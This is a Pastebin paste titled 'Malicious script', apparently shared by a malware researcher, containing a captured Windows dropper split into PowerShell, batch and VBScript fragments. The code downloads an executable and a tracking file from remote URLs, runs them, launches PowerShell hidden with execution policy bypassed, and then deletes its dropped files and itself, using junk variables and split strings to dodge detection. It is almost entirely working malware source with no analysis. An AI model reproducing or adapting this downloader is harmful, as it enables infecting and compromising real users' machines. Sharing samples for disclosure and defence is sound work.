SHARE
TWEET

Malicious script

dynamoo Jul 22nd, 2015 296 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <text10>$njqkwdnjkqw='jwqdnkqwhj21kjh1j21';
  2. $qbjwdjqwbdq='1j2ehkj12h jk12hekj21 ';
  3. $down = New-Object System.Net.WebClient;
  4. $jqwdnjqkwdbj='n21jek12ehj 12hejk21 hejk';
  5. $file = $pths+$nnm+'.'+'e'+'xe';
  6. $statsfile = $pths+'444.jpg';
  7. $down.headers[''+'User-Agent'] = ''+'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
  8. $dasdw='asdgjasd';
  9. $down.DownloadFile($ggtt,$file);
  10. $down.DownloadFile($stat,$statsfile);
  11. $asndjkashdas='hqugdhjgqw hj2gjh1gd hj12ghej1';
  12. $ScriptDir = $MyInvocation.ScriptName;
  13. $vbsFilePath = $pths+$wehs+'.'+'v'+'bs'+'';
  14. $statFilePath = 'c:\Users\MM\AppData\Local\Temp\444'+'.'+'jpg';
  15. $btFilePath = $pths+$wehs+'.'+'b'+'at';
  16. $psFilePath = $pths+$wehs+'.'+'ps'+'1';
  17. $asdhjqgwdq='qhwgdjqwghdjqw';
  18. $qwbhg21jd21h='jakshdjhagsdasd';
  19. Start-Sleep -s 13;
  20. cmd.exe /c  $file;    
  21. $file1 = gci $vbsFilePath -Force
  22. $nqjwdhgjqwd='qvdhqgwjdgwq';
  23. $file2 = gci $btFilePath -Force
  24. $file3 = gci $psFilePath -Force
  25. $kasldds = $vbsFilePath
  26. If (Test-Path $kasldds){ Remove-Item $kasldds }
  27. If (Test-Path $btFilePath){ Remove-Item $btFilePath }
  28. If (Test-Path $statFilePath){ Remove-Item $statFilePath }
  29. $asbdhjags = 'jahdjkhdjk21 21hjkhe jkhsakhd assd';
  30. If (Test-Path $file){ Remove-Item $file }
  31. Remove-Item $MyINvocation.InvocationName</text10>
  32. <text20>ping 3.2.1.1 -n 2
  33. chcp 1251
  34. :nuwqhduiw
  35. set Rts2="vb"
  36. set Rts1="."
  37. set Rts3="s"</text20>
  38. <text21>:byqdyqwgjhg
  39. cscript.exe %Rts4%%Rts1%%Rts2%%Rts3%
  40. exit</text21>
  41. <text30>Dim dff
  42. dff = 68
  43. swdff = 68
  44. currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))
  45. Set objFSO=CreateObject("Scripting.FileSystemObject")
  46. huih = ".ps"&"1"
  47. nuaaa = "powerShell.exe"</text30>
  48. <text31>Set objShell = CreateObject("Wscript.shell")
  49. objShell.Run ""&nuaaa&" -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true</text31>
  50. <stext1>@echo off
  51. :wdhqgdhjg
  52. :jqwidqwdh
  53. ping 1.2.3.1 -n 2
  54. set ggtt="bs"</stext1>
  55. <stext2>cscript.exe %trfd%%nmsj%".v"%ggtt%
  56. ping 2.2.1.1 -n 2
  57. :windows
  58. %trfd%%exds%".exe"
  59. :loop
  60. ping 1.3.1.2 -n 1
  61. set tar1=%nmsj%".bat"
  62. set stat="444.png"
  63. del %trfd%%nmsj%".v"%ggtt%
  64. del %trfd%%tar1%
  65. del %trfd%%stat%
  66. if exist %trfd%%tar1% goto loop
  67. if exist %trfd%%nmsj%".vbs" goto loop
  68. exit</stext2>
  69.  
  70. <stext3>frgea ="M"+"SX"+"ML2.ServerX"+"MLH"+"T"+"T"+Chr(80)+""
  71. Set objXMLHTTP = CreateObject(frgea)
  72. Set sFs = CreateObject(frgea)
  73. objXMLHTTP.open "G"+"ET", strRT, False
  74. sFs.open "GET", statRT, False
  75. objXMLHTTP.send()
  76. sFs.send()
  77. If objXMLHTTP.Status = 200 Then
  78. uwqhda = "AD"&"ODB."
  79. jaisd = uwqhda
  80. Set objADOStream = CreateObject(jaisd+Chr(Sgn(-4)+84)+""&"tr"&"eam"&"")
  81. objADOStream.Open
  82. objADOStream.Type = 1
  83. objADOStream.Write objXMLHTTP.ResponseBody
  84. objADOStream.Position = 0
  85. objADOStream.SaveToFile strTecation
  86. objADOStream.Close
  87. Set objADOStream = Nothing
  88. End if
  89. Set objXMLHTTP = Nothing
  90. uhqgwduqgwd = "qihwduiqwudqwi hdqwhd"
  91. Set objShell = CreateObject("WScript.Shell")</stext3>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top